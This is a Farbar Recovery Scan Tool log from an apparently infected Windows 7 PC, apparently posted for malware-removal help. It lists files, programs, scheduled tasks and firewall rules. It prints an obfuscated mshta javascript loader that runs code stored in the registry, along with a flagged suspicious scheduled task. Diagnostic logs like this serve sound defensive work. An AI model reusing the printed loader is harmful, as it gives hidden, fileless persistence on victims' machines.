2017-04-22 08:37 - 2015-09-12 07:17 - 00001170 _____ C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk

2017-04-22 08:37 - 2015-09-12 07:17 - 00000983 _____ C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk

2017-04-22 08:11 - 2015-09-28 09:30 - 00000000 ____D C:\Users\HP\AppData\Roaming\vlc

2017-04-21 20:02 - 2015-10-12 17:31 - 00000000 ____D C:\ProgramData\Package Cache

2017-04-21 08:51 - 2009-07-14 08:32 - 00000000 ____D C:\Program Files\MSBuild

2017-04-19 21:42 - 2016-12-14 13:49 - 00000000 ____D C:\Users\HP\Desktop\Backups

2017-04-19 07:57 - 2015-09-24 16:14 - 00000000 ____D C:\Users\HP\AppData\Local\Steam

2017-04-14 09:36 - 2015-12-30 14:59 - 00001019 _____ C:\Users\HP\Desktop\sprint binds.txt

2017-04-12 06:45 - 2015-09-19 15:17 - 00000000 ____D C:\Windows\SysWOW64\Macromed

2017-04-11 15:09 - 2016-02-04 18:11 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task

2017-04-11 15:08 - 2016-02-04 18:10 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk

2017-04-08 18:58 - 2016-02-04 18:07 - 00000000 ____D C:\Users\HP\AppData\Local\Adobe

2017-04-08 01:06 - 2015-09-12 18:45 - 00532136 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe

2017-04-07 21:36 - 2016-07-09 10:13 - 00000000 ____D C:\Users\HP\AppData\Roaming\Riot Games

2017-04-07 20:01 - 2015-09-12 18:28 - 00000000 ____D C:\Program Files (x86)\Google

2017-04-07 19:59 - 2015-09-12 18:27 - 00000000 ____D C:\Users\HP\AppData\Local\Deployment

2017-04-07 19:54 - 2015-09-12 07:16 - 00000000 ___HD C:\Users\HP

2017-04-07 19:53 - 2017-02-03 18:42 - 00000000 ____D C:\Users\HP\AppData\Local\Discord

2017-04-07 19:53 - 2015-09-19 12:36 - 00000000 ____D C:\Users\HP\AppData\Roaming\Mumble

2017-04-07 19:53 - 2009-07-14 06:20 - 00000000 ____D C:\Windows\inf

2017-04-07 19:52 - 2015-09-12 18:28 - 00000000 ____D C:\Users\HP\AppData\Local\Google

2017-04-07 19:52 - 2009-07-14 06:20 - 00000000 ____D C:\Windows\registration

2017-04-07 19:51 - 2016-06-12 16:49 - 00000000 ____D C:\Games

2017-04-04 16:22 - 2015-09-13 10:02 - 00000000 ____D C:\Program Files\PowerISO

2017-04-03 20:08 - 2009-07-14 06:20 - 00000000 ____D C:\Windows\system32\NDF

2017-03-28 11:07 - 2015-09-16 19:47 - 00000000 ____D C:\Windows\SysWOW64\directx

2017-03-25 17:32 - 2015-09-13 08:44 - 00000000 ____D C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games

2017-03-25 13:57 - 2015-09-13 10:02 - 00000812 _____ C:\Users\Public\Desktop\PowerISO.lnk

 

==================== Files in the root of some directories =======

 

2015-10-24 13:43 - 2016-10-07 20:59 - 0007605 _____ () C:\Users\HP\AppData\Local\Resmon.ResmonCfg

2015-11-19 19:41 - 2015-11-19 19:41 - 0000003 _____ () C:\Users\HP\AppData\Local\updater.log

2015-11-19 19:41 - 2015-11-19 19:42 - 0000059 _____ () C:\Users\HP\AppData\Local\UserProducts.xml

 

Some files in TEMP:

====================

2006-10-17 08:20 - 2006-10-17 08:20 - 0569344 _____ (Electronic Arts Inc.) C:\Users\HP\AppData\Local\Temp\AutoRun.exe

2015-09-19 15:15 - 2006-10-13 11:01 - 0528384 _____ (Electronic Arts Inc.) C:\Users\HP\AppData\Local\Temp\AutoRunGUI.dll

2013-08-05 09:15 - 2013-08-05 09:15 - 4292136 _____ (www.Bandisoft.com) C:\Users\HP\AppData\Local\Temp\bdfilters.dll

2016-09-06 17:13 - 2016-09-06 17:13 - 7850088 _____ (Microsoft Corporation) C:\Users\HP\AppData\Local\Temp\BingBarSetup-Partner.exe

2017-03-13 16:49 - 2004-09-20 12:27 - 0040960 _____ () C:\Users\HP\AppData\Local\Temp\comver.dll

2011-03-30 11:40 - 2011-03-30 11:40 - 0095576 _____ (Microsoft Corporation) C:\Users\HP\AppData\Local\Temp\DSETUP.dll

2011-03-30 11:40 - 2011-03-30 11:40 - 1566040 _____ (Microsoft Corporation) C:\Users\HP\AppData\Local\Temp\dsetup32.dll

2011-03-30 11:40 - 2011-03-30 11:40 - 0517976 _____ (Microsoft Corporation) C:\Users\HP\AppData\Local\Temp\DXSETUP.exe

2015-09-19 15:15 - 2006-10-13 11:01 - 0720896 _____ () C:\Users\HP\AppData\Local\Temp\EAInstall.dll

2015-09-19 15:43 - 2006-10-17 08:20 - 0253952 _____ (Electronic Arts Inc.) C:\Users\HP\AppData\Local\Temp\eauninstall.exe

2017-03-13 17:08 - 1999-06-25 10:55 - 0149504 _____ () C:\Users\HP\AppData\Local\Temp\GLB1A2B.EXE

2015-09-27 17:31 - 2015-09-29 20:55 - 0035680 _____ () C:\Users\HP\AppData\Local\Temp\i4jdel1.exe

2015-09-19 15:43 - 2006-09-23 09:10 - 0073728 _____ (Electronic Arts Inc.) C:\Users\HP\AppData\Local\Temp\Need for Speed Carbon_uninst.exe

2012-10-01 15:22 - 2012-10-01 15:22 - 0150648 ____R (Microsoft Corporation) C:\Users\HP\AppData\Local\Temp\ose00002.exe

2017-04-20 10:04 - 2017-04-20 10:04 - 0049152 _____ (Alienware) C:\Users\HP\AppData\Local\Temp\sansevierias.dll

2016-02-21 19:25 - 2016-02-21 19:28 - 47347840 _____ (Skype Technologies S.A.) C:\Users\HP\AppData\Local\Temp\SkypeSetup.exe

2016-07-01 19:58 - 2016-07-01 19:59 - 0696832 ____N () C:\Users\HP\AppData\Local\Temp\sqlite-3.8.10.1-19805034-23e3-480e-803b-cbdc2f7d3ffb-sqlitejdbc.dll

2015-10-31 17:46 - 2016-12-28 18:46 - 0116777 _____ () C:\Users\HP\AppData\Local\Temp\Uninstall.exe

2015-12-04 17:41 - 2015-12-04 17:42 - 4216840 _____ (Microsoft Corporation) C:\Users\HP\AppData\Local\Temp\vcredist9_x86.exe

 

==================== Bamital & volsnap ======================

 

(There is no automatic fix for files that do not pass verification.)

 

C:\Windows\system32\winlogon.exe => File is digitally signed

C:\Windows\system32\wininit.exe => File is digitally signed

C:\Windows\SysWOW64\wininit.exe => File is digitally signed

C:\Windows\explorer.exe => File is digitally signed

C:\Windows\SysWOW64\explorer.exe => File is digitally signed

C:\Windows\system32\svchost.exe => File is digitally signed

C:\Windows\SysWOW64\svchost.exe => File is digitally signed

C:\Windows\system32\services.exe => File is digitally signed

C:\Windows\system32\User32.dll => File is digitally signed

C:\Windows\SysWOW64\User32.dll => File is digitally signed

C:\Windows\system32\userinit.exe => File is digitally signed

C:\Windows\SysWOW64\userinit.exe => File is digitally signed

C:\Windows\system32\rpcss.dll => File is digitally signed

C:\Windows\system32\dnsapi.dll => File is digitally signed

C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed

C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

 

LastRegBack: 2017-04-22 12:00

 

==================== End of FRST.txt ============================

 

 

 

 

 

Addition log:

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 22-04-2017

Ran by HP (22-04-2017 16:57:09)

Running from C:\Users\HP\Desktop

Windows 7 Professional (X64) (2015-09-12 04:16:35)

Boot Mode: Normal

==========================================================

 

 

==================== Accounts: =============================

 

Administrator (S-1-5-21-1988295413-3700943990-1798627009-500 - Administrator - Disabled)

Guest (S-1-5-21-1988295413-3700943990-1798627009-501 - Limited - Disabled)

HP (S-1-5-21-1988295413-3700943990-1798627009-1000 - Administrator - Enabled) => C:\Users\HP

 

==================== Security Center ========================

 

(If an entry is included in the fixlist, it will be removed.)

 

AV: Microsoft Security Essentials (Enabled - Up to date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}

AS: Microsoft Security Essentials (Enabled - Up to date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}

AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

 

==================== Installed Programs ======================

 

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 

"FIFA 14" (HKLM-x32\...\{6049054B-DB11-48E1-A583-9A565D5C8856}_is1) (Version: 1.3.0.0 - )

µTorrent (HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\uTorrent) (Version: 3.4.9.43388 - BitTorrent Inc.)

Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)

Adobe Flash Player 25 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 25.0.0.148 - Adobe Systems Incorporated)

AutoHotkey 1.1.22.09 (HKLM\...\AutoHotkey) (Version: 1.1.22.09 - Lexikos)

CLEO 4.3 (HKLM-x32\...\{A8F37EB0-C741-41D7-8CAB-5B40ECEEF094}_is1) (Version: 4.3 - Seemann, Deji, Alien)

D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden

Fraps (remove only) (HKLM-x32\...\Fraps) (Version:  - )

Google Chrome (HKLM-x32\...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)

Google Update Helper (x32 Version: 1.3.33.3 - Google Inc.) Hidden

GTA:SA Crash Fix-v2.4 (HKLM-x32\...\GTA:SA Crash Fix-v2.4) (Version: v2.4 - Whitetiger)

Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3431 - Intel Corporation)

Java 8 Update 111 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180111F0}) (Version: 8.0.1110.14 - Oracle Corporation)

League of Legends (HKLM-x32\...\League of Legends 4.2.1) (Version: 4.2.1 - Riot Games)

League of Legends (x32 Version: 4.2.1 - Riot Games) Hidden

Lightshot-5.3.0.0 (HKLM-x32\...\{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1) (Version: 5.3.0.0 - Skillbrains)

Metric Collection SDK 35 (x32 Version: 1.2.0010.00 - Lenovo Group Limited) Hidden

Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)

Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{59E4543A-D49D-4489-B445-473D763C79AF}) (Version: 2.0.672.0 - Microsoft Corporation)

Microsoft Office Professional Plus 2013 (HKLM-x32\...\Office15.PROPLUS) (Version: 15.0.4420.1017 - Microsoft Corporation)

Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.8.204.0 - Microsoft Corporation)

Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)

Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)

Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)

Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{1a63c099-febd-4eaf-83ad-a82ea4fdac49}) (Version: 12.0.30501.0 - Корпорация Майкрософт)

Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{b55f7208-e02b-4828-ac78-59c73ddf5bc7}) (Version: 12.0.30501.0 - Корпорация Майкрософт)

Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)

Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)

Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)

Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)

Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden

MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)

NVIDIA PhysX (HKLM-x32\...\{3F5C371F-8EA2-4F25-9D3D-D0B4526E3AEA}) (Version: 9.10.0513 - NVIDIA Corporation)

OBS Studio (HKLM-x32\...\OBS Studio) (Version: 18.0.1 - OBS Project)

Outils de vérification linguistique 2013 de Microsoft Office - Français (x32 Version: 15.0.4420.1017 - Microsoft Corporation) Hidden

ParentalControl(x86) (HKU\.DEFAULT\...\ParentalControl) (Version:  - )

PowerISO (HKLM-x32\...\PowerISO) (Version: 6.8 - Power Software Ltd)

Project Zomboid (HKLM\...\Steam App 108600) (Version:  - The Indie Stone)

Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)

Skype™ 7.10 (HKLM-x32\...\{6A0549A9-1B96-498C-ACBC-3943001FEB19}) (Version: 7.10.101 - Skype Technologies S.A.)

Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)

TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)

VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)

Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)

WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)

 

==================== Custom CLSID (Whitelisted): ==========================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

CustomCLSID: HKU\S-1-5-21-1988295413-3700943990-1798627009-1000_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation)

 

==================== Scheduled Tasks (Whitelisted) =============

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

Task: {09F5CBAD-E307-4F17-A703-07B1F2BF3CE9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-07] (Google Inc.)

Task: {22F66836-DF7B-4793-9F04-FC8E255DD02E} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => %ProgramFiles%\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe 

Task: {2ADBDC4B-09A5-4957-8021-596523253262} - System32\Tasks\{B057C60C-3FC4-43D4-86B4-ADB5B47005C4} => pcalua.exe -a "C:\Program Files (x86)\Electronic Arts\Need for Speed Carbon\nfs_uninst.exe" -d "C:\Program Files (x86)\Electronic Arts\Need for Speed Carbon"

Task: {2E6AD43C-9B7E-4B4D-B127-8DDA400429C4} - System32\Tasks\Realtek HD Audio => C:\Users\HP\AppData\Roaming\SecuROM\Realtek HD\rthdcpl.exe [2016-06-12] () <==== ATTENTION

Task: {3325DDD7-BD30-4A5F-8A4F-9241EBE43365} - System32\Tasks\RegIdleBackup => C:\windows\icm32.exe [2017-04-22] ()

Task: {44507965-AB32-45A0-9037-627912BE4D51} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation)

Task: {6FC221A6-B17C-4DBB-9BDF-F541A7FEB435} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-07] (Google Inc.)

Task: {9E71D6F2-9FDF-4F84-A08A-4BF032E1A962} - System32\Tasks\{9DC3C148-A635-469D-B6C5-7B48EC8BEC4C} => pcalua.exe -a "C:\Program Files (x86)\TeamSpeak 3 Client\package_inst.exe" -d C:\Users\HP\Desktop -c "C:\Users\HP\Desktop\ts3_overlay-v3.8.23.ts3_plugin"

Task: {B357887E-D687-41F0-BC9B-69046826C8B9} - System32\Tasks\{390B4BC4-913C-42CB-8F5F-90341B4FC536} => pcalua.exe -a C:\Users\HP\Desktop\dotnetfx35.exe -d C:\Users\HP\Desktop

Task: {CA1AB6CF-FE62-42FB-9E4B-6BEA8C94A853} - System32\Tasks\update-S-1-5-21-1988295413-3700943990-1798627009-1000 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe 

Task: {D8CB8877-7922-4C86-B334-D3C83957C2C5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-04-12] (Adobe Systems Incorporated)

Task: {DC6DE3CF-AD1E-4080-A50D-071E517F7760} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-03] (Adobe Systems Incorporated)

Task: {E4C01461-EB1E-4E90-B5C9-0249077C2782} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe 

Task: {EDAC11F3-0ABA-47D3-93B3-5907AD49E321} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_25_0_0_148_pepper.exe [2017-04-12] (Adobe Systems Incorporated)

Task: {F4938FDB-88AC-456F-AF11-0A6896012023} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation)

Task: {F7AF3418-358E-4609-9103-5FFAF7774AB2} - System32\Tasks\{86222619-D61C-4F8D-A492-9008F70161F8} => pcalua.exe -a "C:\Users\HP\Downloads\[PC] Medal of Honor Airborne [RIP] [dopeman]\MOHA\Medal of Honor Airborne\UnrealEngine3\Binaries\moha_setup.exe" -d "C:\Users\HP\Downloads\[PC] Medal of Honor Airborne [RIP] [dopeman]\MOHA\Medal of Honor Airborne\UnrealEngine3\Binaries" -c dxlevel 91

Task: {FCAC6AD3-34A7-4EF5-9186-B83F0C45FD1E} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => %ProgramFiles(x86)%\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe 

 

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

 

Task: C:\Windows\Tasks\update-S-1-5-21-1988295413-3700943990-1798627009-1000.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe

Task: C:\Windows\Tasks\update-sys.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe

 

==================== Shortcuts =============================

 

(The entries could be listed to be restored or removed.)

 

==================== Loaded Modules (Whitelisted) ==============

 

2012-10-01 20:34 - 2012-10-01 20:34 - 06522480 _____ () C:\Program Files\Microsoft Office\Office15\1033\GrooveIntlResource.dll

2015-11-14 20:07 - 2015-11-11 14:04 - 01143808 _____ () C:\Program Files\AutoHotkey\AutoHotkey.exe

2017-04-07 20:02 - 2017-03-29 11:47 - 02885464 _____ () C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\libglesv2.dll

2017-04-07 20:02 - 2017-03-29 11:47 - 00099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\libegl.dll

2012-10-01 20:33 - 2012-10-01 20:33 - 06522480 _____ () C:\Program Files (x86)\Microsoft Office\Office15\1033\GrooveIntlResource.dll

 

==================== Alternate Data Streams (Whitelisted) =========

 

(If an entry is included in the fixlist, only the ADS will be removed.)

 

AlternateDataStreams: C:\ProgramData:NT [40]

AlternateDataStreams: C:\ProgramData:NT2 [344]

AlternateDataStreams: C:\Users\All Users:NT [40]

AlternateDataStreams: C:\Users\All Users:NT2 [344]

AlternateDataStreams: C:\ProgramData\Application Data:NT [40]

AlternateDataStreams: C:\ProgramData\Application Data:NT2 [344]

AlternateDataStreams: C:\Users\HP\Application Data:NT [40]

AlternateDataStreams: C:\Users\HP\Application Data:NT2 [344]

AlternateDataStreams: C:\Users\HP\AppData\Roaming:NT [40]

AlternateDataStreams: C:\Users\HP\AppData\Roaming:NT2 [344]

 

==================== Safe Mode (Whitelisted) ===================

 

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

 

 

==================== Association (Whitelisted) ===============

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

 

HKU\.DEFAULT\Software\Classes\23352ea4: "C:\Windows\system32\mshta.exe" "javascript:fX5Ma="nNrr";JA1=new ActiveXObject("WScript.Shell");CSc4J="v9eFQB";o3BHJ5=JA1.RegRead("HKCU\\software\\uafzn\\pasf");Gb9xLXb="36Ad";eval(o3BHJ5);lnG1a="d";" <===== ATTENTION

 

==================== Internet Explorer trusted/restricted ===============

 

(If an entry is included in the fixlist, it will be removed from the registry.)

 

 

==================== Hosts content: ===============================

 

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

 

2009-07-14 05:34 - 2017-04-21 08:55 - 00007289 ____A C:\Windows\system32\Drivers\etc\hosts

 

 

==================== Other Areas ============================

 

(Currently there is no automatic fix for this section.)

 

HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\HP\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg

DNS Servers: 8.8.8.8 - 8.8.4.4

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)

Windows Firewall is enabled.

 

==================== MSCONFIG/TASK MANAGER disabled items ==

 

 

==================== FirewallRules (Whitelisted) ===============

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe

FirewallRules: [TCP Query User{7B1118C8-6331-4F74-8930-1167DA5E3E26}C:\users\hp\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\hp\appdata\roaming\utorrent\utorrent.exe

FirewallRules: [UDP Query User{2CC20DD6-01D5-4490-89A6-147032A36F9D}C:\users\hp\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\hp\appdata\roaming\utorrent\utorrent.exe

FirewallRules: [TCP Query User{EE098C1C-5469-4A60-ACCA-42A705D3434A}C:\program files (x86)\fifa 14\game\fifa14.exe] => (Allow) C:\program files (x86)\fifa 14\game\fifa14.exe

FirewallRules: [UDP Query User{F9D27D5B-4A48-4C94-83FE-494AE9427821}C:\program files (x86)\fifa 14\game\fifa14.exe] => (Allow) C:\program files (x86)\fifa 14\game\fifa14.exe

FirewallRules: [TCP Query User{18CB8871-1737-4200-8959-A06B9C8458E7}C:\users\hp\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\hp\appdata\roaming\utorrent\utorrent.exe

FirewallRules: [UDP Query User{FE39E1A7-3BCE-47B8-ADDE-41D1A07E2006}C:\users\hp\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\hp\appdata\roaming\utorrent\utorrent.exe

FirewallRules: [TCP Query User{639E2C2B-16A6-4DDC-BA2F-D0118B46FD94}C:\program files (x86)\mta san andreas 1.5\server\mta server.exe] => (Allow) C:\program files (x86)\mta san andreas 1.5\server\mta server.exe

FirewallRules: [UDP Query User{B94F2984-11FB-4AD7-887A-50732770D7CA}C:\program files (x86)\mta san andreas 1.5\server\mta server.exe] => (Allow) C:\program files (x86)\mta san andreas 1.5\server\mta server.exe

FirewallRules: [TCP Query User{BA364FC7-24DC-4A1A-A664-50B3D4A8787D}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe

FirewallRules: [UDP Query User{62099E17-A9FD-4F61-978E-900F47541AD0}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe

FirewallRules: [TCP Query User{A3C7731C-C901-4AED-8606-788E21702FC6}C:\users\hp\downloads\project_zomboid_build_33.5\project_zomboid_build_33.5\project_zomboid_build_33.5\projectzomboid64.exe] => (Allow) C:\users\hp\downloads\project_zomboid_build_33.5\project_zomboid_build_33.5\project_zomboid_build_33.5\projectzomboid64.exe

FirewallRules: [UDP Query User{0DBE3ACB-D74C-4760-AD7C-63874D80219F}C:\users\hp\downloads\project_zomboid_build_33.5\project_zomboid_build_33.5\project_zomboid_build_33.5\projectzomboid64.exe] => (Allow) C:\users\hp\downloads\project_zomboid_build_33.5\project_zomboid_build_33.5\project_zomboid_build_33.5\projectzomboid64.exe

FirewallRules: [TCP Query User{1B48C685-D696-4B92-B371-FF1F999C1240}C:\users\hp\desktop\samp037_svr_r2-1-1_win32\samp-server.exe] => (Allow) C:\users\hp\desktop\samp037_svr_r2-1-1_win32\samp-server.exe

FirewallRules: [UDP Query User{E0FC5156-76FB-4CE7-B1A7-C717BA03DC61}C:\users\hp\desktop\samp037_svr_r2-1-1_win32\samp-server.exe] => (Allow) C:\users\hp\desktop\samp037_svr_r2-1-1_win32\samp-server.exe

FirewallRules: [TCP Query User{EE118442-1EF2-4B6F-A3A3-5BF7DF60D798}C:\users\hp\desktop\texture studio\samp-server.exe] => (Allow) C:\users\hp\desktop\texture studio\samp-server.exe

FirewallRules: [UDP Query User{E9C3F6D7-8819-4D97-8404-70B0BACD5DAD}C:\users\hp\desktop\texture studio\samp-server.exe] => (Allow) C:\users\hp\desktop\texture studio\samp-server.exe

FirewallRules: [TCP Query User{312991FA-EB93-4EF3-9439-F83B1B183571}C:\users\hp\downloads\project.zomboid.build.32.30\project.zomboid.build.32.30\projectzomboid64.exe] => (Allow) C:\users\hp\downloads\project.zomboid.build.32.30\project.zomboid.build.32.30\projectzomboid64.exe

FirewallRules: [UDP Query User{15EF6B01-90B6-431F-9F8B-EDEFAAADFAA9}C:\users\hp\downloads\project.zomboid.build.32.30\project.zomboid.build.32.30\projectzomboid64.exe] => (Allow) C:\users\hp\downloads\project.zomboid.build.32.30\project.zomboid.build.32.30\projectzomboid64.exe

FirewallRules: [{97CF9C87-D4EC-40EB-9A08-BCF03A686954}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe

FirewallRules: [{64B9E22B-95AD-4020-AE0D-D9BFAB7323DC}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe

FirewallRules: [{E84A0326-576C-4A54-9086-AAA0906B612D}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe

